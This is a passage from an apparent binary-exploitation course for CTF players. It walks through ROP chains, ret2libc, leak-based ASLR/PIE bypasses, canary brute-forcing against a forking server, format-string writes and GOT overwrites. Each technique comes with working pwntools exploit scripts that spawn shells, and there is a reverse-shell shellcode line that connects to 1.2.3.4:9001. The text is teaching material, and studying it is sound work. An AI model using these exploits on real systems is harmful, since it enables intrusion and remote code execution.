rop.exit(0) # clean exitPwntools handles RDI, RSI, RDX, alignment, everything. This is a real ROP chain you'd write for a CTF.
The Stack Pivot Concept
Sometimes the buffer is too small for a long ROP chain. Solution: write the chain to a different location (.bss, heap, etc.) and pivot RSP there.
Pivot gadgets:
| Gadget | Effect |
|---|---|
| leave ; ret | rsp = rbp, then ret. Use with controlled RBP. |
| add rsp, X ; ret | Skip X bytes on stack |
| xchg eax, esp | Pivot stack to whatever's in EAX |
4 // Ret2libc / Ret2system
The binary doesn't have a win() function for you to jump to — but every binary that uses C imports libc, which has system and the string "/bin/sh" already loaded in memory. Use those.
What's Inside libc
libc is a shared library (libc.so.6) loaded at runtime by every dynamically-linked C program. It contains:
- Functions:
printf,puts,system,execve,read,write, etc. - Strings:
"/bin/sh"appears as a literal in libc itself. - "One gadgets": magic addresses where calling them = instant shell.
The Setup (ASLR off, for now)
#include <stdio.h>
void vuln() { char buf[64]; gets(buf); }
int main() { vuln(); return 0; }gcc -fno-stack-protector -no-pie -o ret2libc ret2libc.c
echo 0 | sudo tee /proc/sys/kernel/randomize_va_spaceFind the Pieces
# 1. system address in libc
$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep " system@"
1481: 0000000000050d70 45 FUNC WEAK DEFAULT 17 system@@GLIBC_2.2.5
# 2. /bin/sh string in libc
$ strings -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
1d8678 /bin/sh
# 3. libc base address (with ASLR off it's stable)
$ ldd ./ret2libc
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c00000)Real addresses: system = libc_base + 0x50d70, "/bin/sh" = libc_base + 0x1d8678.
The Exploit (manual)
from pwn import *
exe = ELF("./ret2libc")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p = process(exe.path)
libc.address = 0x00007ffff7c00000 # with ASLR off
system = libc.symbols["system"]
binsh = next(libc.search(b"/bin/sh"))
pop_rdi = 0x401333 # in the binary
ret = 0x40101a # stack alignment
payload = b"A" * 72
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret) # align stack to 16 bytes
payload += p64(system)
p.sendline(payload)
p.interactive()The Exploit (pwntools)
from pwn import *
exe = ELF("./ret2libc")
libc = exe.libc # auto-detect
libc.address = 0x7ffff7c00000
p = process(exe.path)
rop = ROP([exe, libc])
rop.system(next(libc.search(b"/bin/sh")))
p.sendline(b"A"*72 + rop.chain())
p.interactive()One Gadgets — The Magic Shortcut
Inside libc, there are several addresses where, if RIP lands there with certain register conditions met, you instantly get a shell. They're called one gadgets:
$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0xebc81 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL
0xebc85 execve("/bin/sh", r15, rdx)
constraints:
...
0xebc88 execve("/bin/sh", rsi, rdx)
constraints:
...If the constraints are satisfied at the moment you jump there, no setup needed:
payload = b"A" * 72
payload += p64(libc_base + 0xebc81) # one gadget. shell.Sometimes none of the gadgets' constraints fit your situation. Then you fall back to system("/bin/sh"). But always try one_gadget first — it's a 1-line exploit when it works.
The Real Workflow (with ASLR)
You won't have ASLR off in CTF. The realistic ret2libc flow has two stages:
- Leak a libc address (next chapter shows how).
- Subtract a known offset → libc base.
- Compute
systemand"/bin/sh"addresses. - Re-trigger the BOF and send the real exploit.
That's a 2-stage exploit. Read on.
5 // Bypassing PIE & ASLR with Leaks
The whole game changes when you can't hardcode addresses. PIE randomizes the binary base. ASLR randomizes libc, stack, and heap. The fix is the same in both cases: leak one address, derive everything else.
The Magic of Offsets
Addresses are random per-run, but offsets between addresses inside the same module are constant. If you leak one libc address, you know all of libc.
So: leak puts address → subtract libc.symbols['puts'] → that's libc base → add libc.symbols['system'] → real system address.
The PUTS Leak Technique
The standard trick: use the BOF to call puts(puts@got). puts prints a string, and the GOT entry for puts contains puts's real libc address. So puts(puts@got) prints out its own location in libc.
The Vulnerable Program
#include <stdio.h>
void vuln() {
char buf[64];
gets(buf);
}
int main() {
while(1) vuln(); // loop so we can BOF twice
return 0;
}gcc -fno-stack-protector -no-pie -o leak leak_libc.c
# ASLR ON for this one — that's the whole point
echo 2 | sudo tee /proc/sys/kernel/randomize_va_spaceStage 1: Leak puts's libc address
from pwn import *
exe = ELF("./leak")
libc = exe.libc
p = process(exe.path)
pop_rdi = 0x401333
ret = 0x40101a
puts_plt = exe.plt["puts"]
puts_got = exe.got["puts"]
main = exe.symbols["main"]
# Stage 1: call puts(puts@got) — leak libc — return to main
payload = b"A" * 72
payload += p64(pop_rdi)
payload += p64(puts_got) # RDI = puts's GOT entry
payload += p64(puts_plt) # puts(puts_got) → prints libc address
payload += p64(main) # return to main → loop again for stage 2
p.sendline(payload)
# Read leaked address
leaked = p.recvline().strip().ljust(8, b"\x00")
puts_libc = u64(leaked)
log.success("puts @ " + hex(puts_libc))
libc.address = puts_libc - libc.symbols["puts"]
log.success("libc base @ " + hex(libc.address))Stage 2: Use it to call system("/bin/sh")
# continued in same script...
# Stage 2: ret2libc with leaked libc base
binsh = next(libc.search(b"/bin/sh\x00"))
system = libc.symbols["system"]
payload = b"A" * 72
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret) # 16-byte align
payload += p64(system)
p.sendline(payload)
p.interactive()$ python3 solve.py
[+] puts @ 0x7f9e1a3b9420
[+] libc base @ 0x7f9e1a373000
$ id
uid=1000(user) ...Bypassing PIE
Same idea, different target. With PIE on, even main's address is random. To leak it, you can use a format string bug, or leak any address from the binary that ends up on the stack, or an info-leak vuln.
Once you have any one address in the binary, subtract its symbol offset to get the binary base:
leaked_main = 0x55a3d8001234 # leaked somehow
exe.address = leaked_main - exe.symbols["main"]
log.success("binary base @ " + hex(exe.address))
# Now any binary symbol's real address:
real_win = exe.symbols["win"] # auto-uses exe.addressCommon Leak Sources
| Source | What you can leak |
|---|---|
| Format string (%p) | Stack values → libc / canary / saved RBP / saved RIP |
| puts on a GOT entry | That function's libc address |
| printf("%s", ptr) with controlled ptr | Any null-terminated string in memory |
| Heap UAF | Heap pointers → heap base |
| Out-of-bounds read | Anything adjacent to your buffer |
The Pwntools Pattern (memorize)
# Stage 1 boilerplate for any libc leak via puts:
rop = ROP(exe)
rop.puts(exe.got["puts"])
rop.main() # or whatever returns to a vuln
p.sendline(b"A"*72 + rop.chain())
leaked = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leaked - libc.symbols["puts"]This pattern is in 80% of CTF pwn writeups. Burn it into memory.
6 // Stack Canary Bypass
The stack canary is a random 8-byte cookie that sits between local variables and the saved registers. If your overflow touches it, the program calls __stack_chk_fail and dies. To bypass it: read it first, then include the correct value in your payload.
What a Canary Looks Like in Assembly
vuln:
push rbp
mov rbp, rsp
sub rsp, 0x50
mov rax, qword ptr fs:[0x28] ; load canary from TLS
mov qword ptr [rbp - 8], rax ; store on stack
xor eax, eax
... ; function body
mov rax, qword ptr [rbp - 8] ; reload canary
sub rax, qword ptr fs:[0x28] ; should be zero
jne __stack_chk_fail ; if not, abort
leave
retIf you see fs:[0x28] in any function, that function has a canary.
Stack Layout with Canary
An overflow that overwrites RIP must also overwrite the canary at offset 64. So we need to write the correct canary back.
Bypass Method 1: Leak via Format String
If the binary has a format string vulnerability, you can read stack values:
$ ./vuln
Name: AAAA-%lx-%lx-%lx-%lx-%lx-%lx-%lx-%lx
Hello, AAAA-7ffefb812340-0-1-7ffefb812478-7d3a8c9b1500-d3f4a2b800000000-...
↑
that's the canary
(always ends in 00 — that's the null byte at the bottom)Bypass Method 2: Brute-Force on Forking Servers
If the program fork()s a new process for each connection, each child inherits the parent's canary. The canary is only re-randomized when the parent restarts. So you can:
- Connect, send N bytes that overwrite only the first canary byte.
- If the program crashes (server resets connection) → wrong byte. Try the next value.
- If the program continues → that byte is correct. Move to byte 2.
That's 256 × 8 = 2048 attempts max for a full canary leak. Trivial over fast loopback. The first byte of a Linux canary is always 0x00 (it's a security choice — prevents string functions from leaking it), so you actually only need to brute-force 7 bytes.
Brute-Force Script Template
from pwn import *
context.log_level = "warning"
def guess(known, byte):
p = remote("localhost", 1337)
payload = b"A"*64 + known + p8(byte)
p.sendline(payload)
try:
resp = p.recvall(timeout=1)
p.close()
return b"stack smashing" not in resp
except:
p.close()
return False
canary = b"\x00" # first byte always 0x00
for pos in range(7):
for b in range(256):
if guess(canary, b):
canary += p8(b)
log.success(f"byte {pos+1}: {b:02x}")
break
print("canary:", hex(u64(canary)))Putting It Together
Once you have the canary, your payload becomes:
payload = b"A" * 64 # fill buffer
payload += canary # preserve canary
payload += b"B" * 8 # saved RBP (anything)
payload += p64(rip_target) # overwrite RIPBypass Method 3: Skip the Canary
Sometimes you don't need to defeat the canary at all. If you find a different bug — heap UAF, format string write, anything that lets you redirect execution without going through the function epilogue — the canary check never fires.
7 // Format String Vulnerabilities
The most underrated bug in binary exploitation. A single misuse of printf can give you arbitrary read AND arbitrary write — the most powerful primitive in pwn. Format strings can leak canaries, defeat PIE, and overwrite the GOT to get RCE — all without touching the stack.
The Bug
// VULNERABLE
printf(user_input); // user controls the format string
// SAFE
printf("%s", user_input); // format string is hardcodedWhen the format string contains % specifiers, printf reads its arguments from registers (RSI, RDX, RCX, R8, R9 on 64-bit) and then from the stack. If you control the format string, you control which memory gets read.
Quick Confirmation
$ ./vuln
Name: %x %x %x %x
Hello, 7fffffff aaaabaaa cccdcccd... # stack values leak!If your input prints garbage hex when you include format specifiers, you have a format string bug. Confirmed.
Format Specifier Reference
| Specifier | Effect |
|---|---|
| %x | Read 4 bytes as hex |
| %lx | Read 8 bytes as hex (64-bit) |
| %p | Read pointer-sized value |
| %s | Treat arg as pointer, print null-terminated string at that address — arbitrary read |
| %n | Treat arg as pointer, write the count of chars-printed-so-far to that address — arbitrary write |
| %N$x | "Direct argument access" — read the Nth argument directly. Critical. |
Direct Parameter Access
You don't have to print 50 %xs to reach the 50th value. Use %N$x:
$ ./vuln
Name: %7$lx
Hello, 4141414141414141 # 7th stack value is "AAAAAAAA"That tells you your input string starts at the 7th printf argument position. Useful number.
Find Your Offset Once
Spam %N$p for N=1..20 and look for your "AAAA":
>>> for n in range(1, 20):
... p.sendline(f"AAAAAAAA %{n}$lx".encode())
... print(n, p.recvline())
1 0x7ffefb...
2 0x0
...
6 0x4141414141414141 # your input is at position 6Arbitrary Read
To read memory at address X, put X on the stack (as part of your input) and use %s:
payload = p64(0x404010) # target address
payload += b" %6$s" # print the string at that address
p.sendline(payload)
leak = p.recvline()Caveat: the address can't contain null bytes mid-string, because printf stops at the first null in the format string. Workaround: put the address after any format specifiers.
Arbitrary Write with %n
%n writes the number of characters printed so far to the address pointed to by its argument. With width specifiers, you can control that count:
# Write the value 100 to address 0x404020:
payload = p64(0x404020)
payload += b"%96x" # prints 96 chars (8 from address + 96 = 104? no, just 96 width)
payload += b"%6$n" # write 100 to *arg6 = 0x404020To write large values, use %hn (write 2 bytes at a time):
# Write 0xdeadbeef to addr — 2 writes of 2 bytes each
# write 0xbeef to addr+0 (low half)
# write 0xdead to addr+2 (high half)Pwntools Helper
Pwntools has fmtstr_payload — give it the offset and a dict of {address: value} writes, and it builds the format string for you:
from pwn import *
# write 0xdeadbeef to 0x404020, assuming our input is at offset 6
payload = fmtstr_payload(6, {0x404020: 0xdeadbeef})
p.sendline(payload)Pwntools handles the width math, the byte ordering, the offset adjustment as the format string itself grows. Use this. Manually building %n chains is a recipe for off-by-one suffering.
8 // GOT Overwrite via Format String
The Global Offset Table (GOT) is a section of memory containing function pointers for every dynamically-linked library function the binary uses. Overwrite one of those pointers, and the next time the program calls that function, it jumps wherever you want.
How Dynamic Linking Works
When your binary calls puts(), it doesn't actually call libc directly. The compiler emits a call to puts@plt — a tiny stub in the binary's PLT (Procedure Linkage Table). The first time the stub runs, it asks the dynamic linker to resolve puts's real libc address and writes that into the corresponding GOT entry. After that, the PLT stub just jumps through the GOT directly.
The Plan
- Find a format string vuln that runs before a libc function call.
- Overwrite that function's GOT entry with the address of
system. - The next call jumps to
systeminstead. - If we control the original arg (e.g.
printf(user_input)callsputs(user_input)downstream), we now callsystem(user_input)= RCE.
The Vulnerable Program
#include <stdio.h>
int main() {
char buf[200];
printf("> ");
fgets(buf, sizeof(buf), stdin);
printf(buf); // fmt str vuln
puts(buf); // will be hijacked
return 0;
}gcc -fno-stack-protector -no-pie -o fmt_got fmt_got.cStep 1: Find the Format String Offset
$ ./fmt_got
> AAAAAAAA %6$lx
AAAAAAAA 4141414141414141 # input is at offset 6Step 2: Leak libc Base
>>> payload = b"%6$lx" # whatever leaks libc — depends on stack contents
# Or use &puts.got + %s for direct read:
>>> payload = p64(exe.got["puts"]) + b" %8$s" # offset 8 because of the 8-byte address pushing offsetsStep 3: Compute system's Address
libc.address = puts_leak - libc.symbols["puts"]
system_addr = libc.symbols["system"]Step 4: Overwrite puts@got with system
payload = fmtstr_payload(6, {exe.got["puts"]: system_addr})
p.sendline(payload)Now the next puts(buf) in main becomes system(buf). We need buf to contain a shell command. Re-trigger the loop with input "/bin/sh" if there's a loop, or just on the next read.
Putting It All Together
from pwn import *
exe = ELF("./fmt_got")
libc = exe.libc
p = process(exe.path)
# Stage 1: leak puts@got's value (puts's libc address)
payload = p64(exe.got["puts"]) + b" |%8$s|"
p.sendlineafter(b"> ", payload)
p.recvuntil(b"|")
leak = p.recvuntil(b"|", drop=True)
puts_libc = u64(leak.ljust(8, b"\x00"))
log.success(f"puts in libc: {hex(puts_libc)}")
libc.address = puts_libc - libc.symbols["puts"]
system_addr = libc.symbols["system"]
log.success(f"libc base: {hex(libc.address)}")
# Stage 2: overwrite puts@got with system
payload = fmtstr_payload(6, {exe.got["puts"]: system_addr})
p.sendlineafter(b"> ", payload)
# Stage 3: feed "/bin/sh" — puts(buf) is now system(buf)
p.sendlineafter(b"> ", b"/bin/sh")
p.interactive()RELRO Caveat
This entire technique only works if RELRO is NOT Full. With Full RELRO, the GOT is read-only and you'll segfault trying to write to it.
| RELRO level | GOT writable? | This attack works? |
|---|---|---|
| No RELRO | Always | Yes |
| Partial RELRO | Until lazy bind, then no | Sometimes |
| Full RELRO | Never | No — find a different write target |
9 // Integer Overflows
Not always a direct memory corruption, but often the cause of one. An int overflow flips a positive value to a huge unsigned number (or vice versa), bypassing size checks and triggering buffer overflows or arbitrary allocations downstream.
The Two Classic Bugs
Signed-to-Unsigned Conversion▶
void handle(int size, char *src) {
char buf[100];
if (size > 100) return; // signed compare
memcpy(buf, src, size); // size is implicitly cast to size_t (unsigned)
}If user passes size = -1, the check passes (–1 ≤ 100), but memcpy sees size_t(0xFFFFFFFFFFFFFFFF) and copies 16 exabytes. Boom.
Fix: use size_t everywhere, or check for size >= 0 && size <= 100.
Multiplication Overflow in malloc▶
void alloc(size_t n) {
char *buf = malloc(n * 8);
for (int i = 0; i < n; i++) buf[i*8] = ...;
}If n = 0x2000000000000001 on 64-bit, then n * 8 overflows to 8. malloc returns 8-byte buffer. The loop writes to buf[0], buf[8], ... way past the end.
Fix: use calloc(n, 8) which checks for overflow.
Off-By-One via INT_MAX▶
int count = get_user_input();
int total = count + 1; // if count == INT_MAX, total wraps to INT_MIN
char *buf = malloc(total);
for (int i = 0; i < count; i++) buf[i] = 0;malloc(INT_MIN) might fail or return tiny buffer. Loop runs INT_MAX times. Heap obliterated.
How They Get Exploited
Integer bugs rarely give you direct RIP control. They give you a secondary primitive:
| Bug | Primitive |
|---|---|
| Signed→unsigned in memcpy size | Stack/heap buffer overflow |
| Multiplication overflow in malloc | Heap buffer overflow |
| Underflow in idx for array access | Negative-index OOB write |
| Wrap in length field of network packet | Read past buffer → info leak |
Then chain to whatever your secondary primitive enables. An integer bug isn't usually the exploit — it's the door to the exploit.
Worked Example
#include <stdio.h>
#include <string.h>
void store(int len) {
char buf[100];
if (len > 100) {
printf("Too long.\n");
return;
}
printf("Send %d bytes: ", len);
fread(buf, 1, len, stdin); // len is cast to size_t!
}
int main() {
int n;
scanf("%d", &n);
store(n);
}Send -1 as n:
- Check
len > 100→ false (since –1 < 100). fread(buf, 1, -1, stdin)→ fread sees a count of0xFFFFFFFFFFFFFFFF, reads until EOF or buffer fills.- You overflow
buf[100]with as much as you want.
Now it's a regular stack overflow. ROP from here.
Where to Hunt for These
- Length parameters in network protocols (TCP, custom binary protocols).
- File offsets and sizes in parsers (PDFs, images, archives).
- Anywhere user input feeds into
malloc,memcpy,fread,recv, or array indexing. - Functions that accept
intfor sizes (instead ofsize_t).
0 // Pwntools Mastery
You've been using pwntools throughout this course. Now learn to use it like a pro. The difference between someone who can pwn and someone who solves CTFs fast is fluency in this library.
The Universal Template
Start every exploit from this. Edit the variables, leave the structure.
#!/usr/bin/env python3
from pwn import *
# --- target -----
exe = ELF("./vuln")
libc = exe.libc # auto-detected
context.binary = exe
context.terminal = ["tmux", "splitw", "-h"] # for gdb.attach
HOST, PORT = "chal.ctf.io", 31337
# --- launcher -----
def conn():
if args.REMOTE:
return remote(HOST, PORT)
if args.GDB:
return gdb.debug(exe.path, gdbscript=GDB_SCRIPT)
return process(exe.path)
GDB_SCRIPT = """
break *vuln+50
continue
"""
# --- exploit -----
p = conn()
offset = 72
payload = b"A" * offset
payload += p64(0xdeadbeef)
p.sendlineafter(b"> ", payload)
p.interactive()Run it three different ways without changing the script:
python3 solve.py # local process
python3 solve.py REMOTE # connect to remote server
python3 solve.py GDB # launch with gdb attachedProcess Connections
| Function | Use |
|---|---|
| process("./vuln") | Run a local binary |
| remote("host", port) | Connect over TCP |
| ssh(user, host, password=...) | SSH session |
| gdb.debug(path, gdbscript) | Launch with GDB attached, run gdbscript first |
| gdb.attach(p, gdbscript) | Attach to existing process |
I/O Cheat Sheet
This is where 90% of beginners get stuck. Get fluent with these:
| Method | What it does |
|---|---|
| p.send(data) | Send bytes (no newline) |
| p.sendline(data) | Send bytes + \n |
| p.recv(n) | Read up to n bytes |
| p.recvline() | Read one line (incl newline) |
| p.recvuntil(delim) | Read until delim is seen — most reliable |
| p.recvall() | Read until EOF |
| p.sendlineafter(delim, data) | recvuntil(delim) then sendline(data) — cleanest |
| p.sendafter(delim, data) | recvuntil(delim) then send(data) |
| p.interactive() | Hand control to the user — for getting your shell |
| p.close() | Close the connection |
Pack/Unpack Helpers
p64(0xdeadbeef) # → b'\xef\xbe\xad\xde\x00\x00\x00\x00'
p32(0x12345678) # → b'\x78\x56\x34\x12'
p16(0xabcd) # → b'\xcd\xab'
p8(0x41) # → b'A'
u64(b"\xef\xbe\xad\xde...") # → 0xdeadbeef
u64(leak.ljust(8, b"\x00")) # pad short leaks before unpackingELF and Symbol Resolution
e = ELF("./vuln")
e.symbols["main"] # 0x401136 (function in binary)
e.plt["puts"] # 0x401030 (PLT stub)
e.got["puts"] # 0x404018 (GOT entry)
e.bss() # 0x404060 (start of bss)
e.bss(0x100) # bss + offset
next(e.search(b"/bin/sh")) # find string in binary
e.address = 0x55a3d8000000 # set base; symbols update automaticallyROP Object
rop = ROP(exe)
# Method-style: call any imported function
rop.puts(0xdeadbeef)
rop.system(0x404060)
rop.execve(0, 0, 0)
# Raw: append a gadget address
rop.raw(0x40101a) # single ret for alignment
# Find specific gadget
rop.find_gadget(["pop rdi", "ret"])
print(rop.dump()) # pretty-print
chain = rop.chain() # bytes ready to useShellcode Generation
context.arch = "amd64" # or 'i386' for 32-bit
asm(shellcraft.sh()) # /bin/sh shellcode
asm(shellcraft.cat("flag.txt")) # cat a file
asm(shellcraft.dupsh()) # dup stdin/stdout, then sh
asm(shellcraft.connect("1.2.3.4", 9001)) # reverse shell setup
# Custom assembly
asm("mov rdi, 0xdeadbeef; ret")Format String Builder
# Write multiple values in one shot
fmtstr_payload(offset=6, writes={
0x404020: 0xdeadbeef,
exe.got["puts"]: libc.symbols["system"]
})Cyclic Patterns
cyclic(200) # generate
cyclic_find(0x6161617661616175) # lookup → 72
cyclic_find(b"vaaa") # or by 4-byte chunkLogging
log.info("libc base: %s", hex(libc.address))
log.success("Got shell!")
log.warning("Canary might be wrong")
log.failure("Crashed")
log.error("Aborting") # raises exceptionUseful Context Settings
context.arch = "amd64" # or i386, arm, aarch64, mips
context.os = "linux"
context.endian = "little"
context.log_level = "debug" # debug | info | warning | error
# When you set context.binary, all of these are auto-set:
context.binary = ELF("./vuln")The args Object
Pwntools captures any UPPER-CASE word from sys.argv as a flag in args:
$ python3 solve.py REMOTE DEBUG
# In script:
if args.REMOTE: ... # True
if args.DEBUG: ... # TrueUse this to switch between local/remote/GDB without editing code.
1 // Debugging Workflow
You will spend more time in the debugger than writing exploits. The faster you can navigate GDB/pwndbg, the faster you ship. Here's the workflow that works.
Launch Modes
Mode 1: Standalone GDB▶
gdb -q ./vuln
pwndbg> break *vuln+50
pwndbg> run < payload.bin
pwndbg> run < <(python3 -c "print('A'*100)")Use this to manually explore a binary without writing a script first.
Mode 2: gdb.debug() — pwntools launches GDB▶
p = gdb.debug(exe.path, gdbscript="""
break *vuln+50
continue
""")Pwntools opens a new terminal with GDB attached, runs your script, then drops into the breakpoint. Most ergonomic for iterative exploit development.
Mode 3: gdb.attach() — attach to a running process▶
p = process(exe.path)
gdb.attach(p, "break *vuln+50")
p.sendline(b"AAAA")Use when you want pwntools to drive the I/O but pause at a specific point to inspect.
The Pwndbg Cheatsheet
The commands you'll use 100 times a day:
| Command | What |
|---|---|
| vmmap | Show full memory map (where stack/heap/libc/binary live) |
| telescope $rsp | Pretty-print stack with type guesses |
| telescope $rsp 30 | ...show 30 entries |
| nearpc | Disassemble around RIP |
| got | Show GOT contents |
| plt | Show PLT contents |
| procinfo | Show PID, libs, ASLR state |
| checksec | Show binary protections |
| cyclic 200 | Generate de Bruijn pattern |
| cyclic -l $rip | Find offset of crash value |
| search "/bin/sh" | Search memory for a string |
| search -t pointer 0xdeadbeef | Find pointers to a value |
| rop --grep "pop rdi" | Find ROP gadgets in loaded modules |
| canary | Print canary value of current process |
| libc | Show loaded libc base |
The Standard GDB Verbs
| Command | Effect |
|---|---|
| r / run | Run program |
| c / continue | Resume |
| b *0x401234 | Breakpoint at address |
| b vuln | Breakpoint at function |
| b *vuln+50 | Breakpoint at offset within function |
| info b | List breakpoints |
| delete N | Delete breakpoint N |
| n / next | Step over (skip calls) |
| s / step | Step into |
| ni / si | Step over/into one instruction |
| finish | Run until current function returns |
| x/10gx $rsp | Examine 10 quadwords at RSP as hex |
| x/20i $rip | 20 instructions from RIP |
| x/s 0x402000 | Print string at address |
| p $rdi | Print register |
| set $rdi=0xdeadbeef | Set register |
The "x" Command Format
Reading x/10gx $rsp intimidates beginners. It's just x/ address:
| Size | Bytes |
|---|---|
| b | byte (1) |
| h | halfword (2) |
| w | word (4) |
| g | giant (8) ← what you want for x86-64 |
| Format | Meaning |
|---|---|
| x | hex |
| d | decimal |
| s | string |
| i | instruction |
| a | address (with symbol) |
So x/10gx $rsp = "10 giant hex starting at RSP". Memorize this combo for x86-64.
The Iteration Loop
Here's the rhythm of solving a real challenge:
checksecthe binary. Note the protections.- Open in Ghidra. Find the vuln. Note the buffer sizes.
- Quick-test in GDB:
r < <(cyclic 200). Confirm RIP control.cyclic -l $ripfor offset. - Write a minimal pwntools script with that offset and a known address.
- Run with
GDBarg, breakpoint right beforeret,telescope $rsp 5to verify the chain looks right. - Iterate.
- When local works, switch to
REMOTE.
Common Debug Wins
Conditional Breakpoints & Watchpoints
# break only when rdi has a specific value
b *0x40118a if $rdi == 0x404020
# break when an address is written
watch *0x404020
# break when an address is read
rwatch *0x404020Writing GDB Scripts
Save common debugging recipes:
define stk
telescope $rsp 20
end
define hookstop
nearpc 5
telescope $rsp 10
endSource it from ~/.gdbinit. Now stk shows your stack, and pressing n auto-displays disassembly + stack at every step.
2 // Where to Practice Next
You've finished the course. The only thing left is reps. Below are the resources I personally use and recommend, in roughly increasing difficulty. Don't skip the easy ones — speed on basics matters more than struggling with hard challenges.
Tier 1: Guided Beginner
pwn.college. ★ START HERE Free university-grade course from Arizona State. Auto-graded modules, Discord, dojos for every topic in this course. The single best resource on the internet for binexp.
CryptoCat — YouTube. CRYPTOCAT Detailed video walkthroughs of every classic pwn technique. Perfect companion to this course.
pwnable.kr. PWNABLE.KR The OG pwn challenge site. Start with fd, collision, bof. Each one teaches a single concept clearly.
exploit.education. EXPLOIT.EDU Phoenix & Protostar VMs. Boot the VM and work through 50+ progressively harder challenges with full source provided.
Tier 2: Topical Practice
ROP Emporium. ROP 8 challenges that go from simple ret2win to complex multi-stage chains. Same binary in 32-bit and 64-bit so you learn both ABIs.
CryptoCat's CTF repo. FORMAT STRINGS Curated format string challenges with writeups.
how2heap. HEAP Shellphish's heap exploitation curriculum. Classic glibc bugs (House of Force, House of Spirit, etc.). For after this course.
pwnable.tw. PWNABLE.TW Harder cousin of pwnable.kr. Modern challenges — most have full mitigations on.
Tier 3: CTFs (Live Practice)
- picoCTF — easiest entry. Year-round practice on past challenges.
- CTFtime.org — calendar of all upcoming CTFs. Filter by "pwn" tag.
- Hack The Box — pwn challenges + retired full machines with binexp components.
- Hacker101 — HackerOne's free CTF, runs continuously.
Tier 4: Reading List
📘 Hacking: The Art of Exploitation. Jon Erickson. The classic. Read the chapters on stack overflows, format strings, and ROP. Code examples included.
📘 The Shellcoder's Handbook. Older but still relevant for the fundamentals. Especially good on shellcode.
📗 Ir0nstone's Binary Exploitation Notes. Free online book. Covers everything from stack BOF through advanced heap. Most up-to-date free resource.
📗 Nightmare. Intro-to-binexp tutorial repo with 30+ worked CTF challenges, all source included. Best self-paced curriculum.
Tier 5: Beyond This Course
Once stack exploitation feels easy, here's what's next:
- Heap exploitation — UAF, double-free, tcache, fastbin, House of *. how2heap → pwn.college heap.
- Kernel pwn — kernel CTF challenges. Different rules, different bugs (SLUB, modprobe path, etc.).
- Browser exploitation — V8, JSC. Different game. Read browser-pwn.
- Sandbox escapes — seccomp, kctf-style sandboxes. Learn ORW (open/read/write) shellcode.
- Real CVE research — pick an OSS project, audit, file bugs. The honest endgame.
The Honest Truth About Improvement
The single biggest factor in getting better at pwn is solving challenges and reading other people's writeups for the same challenge after. Always. Every time.
Your first solution will be ugly. The top-tier writeups will use techniques you didn't think of. Steal them. Next time you'll see those patterns automatically.
Stay Connected
- CYB3RFY YouTube — CTF walkthroughs, including future binexp content.
- Reverse Engineering Course — the prerequisite course, if you skipped it.
- Discord/Twitter pwn community — search "infosec twitter pwn" — most prominent researchers post writeups daily.
// Interactive Tools
Live tools you can play with right in the browser. No installation — just type, see results, build intuition.
1. Stack Layout Visualizer. Configure a vulnerable function and see exactly how the stack looks before and after the overflow. Adjust the buffer size, canary state, and watch the payload fill the stack. Buffer Size (bytes) Has Stack Canary? No Yes Architecture x86-64 (8-byte) x86 (4-byte) Target RIP Address (hex) Render Stack Apply Overflow Stack View
2. Payload Builder. Construct a pwntools payload by configuring its components. The tool generates the Python code and the byte sequence. Padding Size (bytes) Padding Character Architecture x86-64 (p64) x86 (p32) ROP Chain (one address per line, hex) 0x401333 0x402008 0x40101a 0x401040 Build Payload Generated pwntools code Click "Build Payload" to generate Raw Bytes
3. Cyclic Pattern Generator. Generate a de Bruijn pattern, then look up the offset of any 4 or 8 byte value found in your crashed RIP. Pattern Length Generate Pattern Lookup Value (hex from crashed RIP) Chunk Size 8 bytes (x86-64 RIP) 4 bytes (x86 EIP) Find Offset Result Generate or lookup to see results
4. Checksec Output Explainer. Paste raw checksec output and get a plain-English breakdown of what's enabled and what your exploitation strategy should be. Paste checksec output RELRO STACK CANARY NX PIE Full RELRO Canary found NX enabled PIE enabled Analyze
5. Quick Shellcode Reference. Common shellcode payloads, ready to copy. All x86-64 Linux, null-byte-free. Pick a shellcode execve("/bin/sh", 0, 0) — 27 bytes cat /flag.txt — read+write loop exit(0) — 7 bytes reverse shell stub Pick one above
// Practice Challenges
Five challenges that mirror the chapters. Try them in order. Each one targets one specific technique. Source code & build flags shown so you can compile and try locally.
Challenge 01 — Find the Offset
Goal: Find the offset to RIP using cyclic. Confirm RIP control. No win function — you're just learning to find offsets.
// chal01.c
#include <stdio.h>
void v(){char b[128];gets(b);}
int main(){v();return 0;}
# Build:
gcc -fno-stack-protector -no-pie -o chal01 chal01.cHint: Use cyclic 200, run inside GDB, look at RIP after crash, cyclic -l $rip.
Challenge 02 — Ret2Win (No Mitigations)
Goal: Hijack RIP to call win(). Use the offset from Challenge 01.
// chal02.c
#include <stdio.h>
#include <stdlib.h>
void win(){system("/bin/sh");}
void v(){char b[128];gets(b);}
int main(){v();return 0;}
gcc -fno-stack-protector -no-pie -o chal02 chal02.cWatch out: If win() calls system(), you may need a ret gadget for stack alignment.
Challenge 03 — 32-bit Ret2libc
Goal: No win() function. Call system("/bin/sh") using libc. ASLR off, 32-bit.
// chal03.c — 32-bit
#include <stdio.h>
void v(){char b[100];gets(b);}
int main(){v();return 0;}
gcc -m32 -fno-stack-protector -no-pie -o chal03 chal03.c
echo 0 | sudo tee /proc/sys/kernel/randomize_va_spaceHint: 32-bit calling convention puts args on the stack. Payload shape: [ pad ][ &system ][ fake_ret ][ &"/bin/sh" ]. Find system and "/bin/sh" in libc.
Challenge 04 — Canary Bypass via Format String
Goal: Two stages. Use the format-string bug to leak the canary. Then BOF preserving the canary, overwriting RIP to win().
// chal04.c
#include <stdio.h>
#include <stdlib.h>
void win(){system("/bin/sh");}
void v(){
char name[64];
printf("name? "); fgets(name, 64, stdin);
printf(name); // fmt str leak
char b[128];
printf("input? "); gets(b); // BOF
}
int main(){v();return 0;}
gcc -no-pie -o chal04 chal04.c # canary ON by defaultHint: Find the format string offset of the canary first using %N$lx. The canary always ends in 00.
Challenge 05 — Full ROP with libc Leak
